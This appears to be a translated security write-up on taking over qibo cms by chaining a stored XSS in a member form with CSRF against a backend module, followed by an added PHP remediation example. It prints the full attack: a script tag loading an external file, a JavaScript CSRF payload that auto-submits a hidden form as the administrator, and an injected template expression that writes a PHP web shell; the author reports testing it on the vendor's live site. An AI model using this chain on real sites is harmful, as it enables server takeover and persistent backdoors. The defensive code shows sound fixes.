Qibo cms: taking down qibo cms by combining three 0day backend getshells with a front-end stored XSS and backend CSRF. The vendor regards the threat as small and the impact as negligible, and although this is not a serious vulnerability, the problems and breakthroughs encountered along the way were satisfying. The test target is the official website. -- by pandas
Some time ago, when Xidu published a qibocms 0day, he looked at the qibo cms code and found several getshells in the backend. There are a lot of backend getshells, and the vendor's attitude is that the impact is minor and negligible. Basically every form submitted in the backend has CSRF. If there were a front-end getshell the power would increase a lot, so I went black-box on the front end and dug out an XSS; in this way it can be used to getshell.

1. Stored XSS location: Member Center -> Omnipotent Form -> Publish Information -> Moderator Application. The submitted value of postdb[sortname][] is not filtered; its length is limited, but the limit is enough to write <script src="http://xxx.com/1.js">. After submission, the administrator needs to go to the backend and choose Shortcut -> Omnipotent Form Model Management -> Moderator Application -> Management -> View Details. The slash is replaced, so the backslash form <script src="http:\xxx.com\1.js"> is used. 1.js is the external file we need to load. Its content: here we need to submit a form located in the backend at System Functions -> Plug-in Management -> Points Introduction Management (jfadmin_mod). Modify any points introduction and insert ${@phpinfo();} in the title or content; this causes code execution. Therefore the submitted code can write a php file. The content of 1.js is as follows:
    // target: the "add points introduction" action of the backend module, on the same host
    thisTHost = top.location.hostname;
    thisTHost = "http://" + thisTHost + "/v7/admin/index.php?lfj=jfadmin&action=addjf";

    // build a hidden POST form and auto-submit it in the administrator's session (CSRF)
    function PostSubmit(url) {
        var postUrl = url;
        var ExportForm = document.createElement("FORM");
        document.body.appendChild(ExportForm);
        ExportForm.method = "POST";
        var newElement = document.createElement("input");
        newElement.setAttribute("name", "title");
        var newElement2 = document.createElement("input");
        newElement2.setAttribute("name", "fid");
        var newElement3 = document.createElement("input");
        newElement3.setAttribute("name", "list");
        var newElement4 = document.createElement("input");
        newElement4.setAttribute("name", "content");
        ExportForm.appendChild(newElement);
        ExportForm.appendChild(newElement2);
        ExportForm.appendChild(newElement3);
        ExportForm.appendChild(newElement4);
        newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}";
        newElement2.value = 1;
        newElement3.value = 1;
        newElement4.value = 1;
        ExportForm.action = postUrl;
        ExportForm.submit();
    };
    PostSubmit(thisTHost);
Two parts make up the proof: 1. User part: 1) log in; 2) write the XSS. 2. Administrator part: view the application; a doggy.php file will then be added under the website's /admin directory, with the following content:
Solution:
Fix these points as a priority.
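Added example for the Solution section, written here in PHP and not taken from qibo cms: the server-side fixes that break each link of the chain above. It assumes, for illustration only, that the points-introduction module renders title/content through a double-quoted eval (which is why ${...} executes), and shows a placeholder renderer without eval, HTML-escaping of the stored sortname value (replacing only "/" is not enough, since browsers accept backslashes in URLs), and a CSRF token check for backend forms; all function names are hypothetical.

```php
<?php
// Added example, not code from qibo cms. All function names are hypothetical.

// Weak pattern (assumed for illustration): user data is rendered by evaluating a
// double-quoted PHP string, so "${@phpinfo();}" in a title becomes executed code.
function render_weak(string $tpl): string {
    return eval('return "' . $tpl . '";');
}

// Hardened renderer: no eval at all. Values are substituted into named
// placeholders with strtr() and HTML-escaped, so "${...}" stays literal text.
function render_safe(string $tpl, array $vars): string {
    $map = [];
    foreach ($vars as $name => $value) {
        $map['{' . $name . '}'] = htmlspecialchars((string)$value, ENT_QUOTES, 'UTF-8');
    }
    return strtr($tpl, $map);
}

// Defence in depth: flag the two sequences PHP interpolates inside double-quoted
// strings, so input can be rejected if a legacy template path still uses eval.
function has_interpolation(string $s): bool {
    return preg_match('/\$\{|\{\$/', $s) === 1;
}

// Stored XSS fix for postdb[sortname][]: escape on output instead of stripping "/".
function escape_sortname(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// CSRF fix for backend forms (requires session_start() in the request handler):
// embed csrf_token() as a hidden field and call csrf_check() before processing.
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
function csrf_check(?string $submitted): bool {
    return $submitted !== null && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $submitted);
}

// Constructed inputs mirroring the write-up's payloads.
$sortname = '<script src="http:\\xxx.com\\1.js">';  // backslash variant of the XSS
$title    = '${@phpinfo();}';                        // template-injection probe
echo escape_sortname($sortname), "\n";               // rendered as text, not as a tag
echo render_safe('<h2>{title}</h2>', ['title' => $title]), "\n"; // literal, not executed
var_dump(has_interpolation($title));                 // bool(true): reject before storing
```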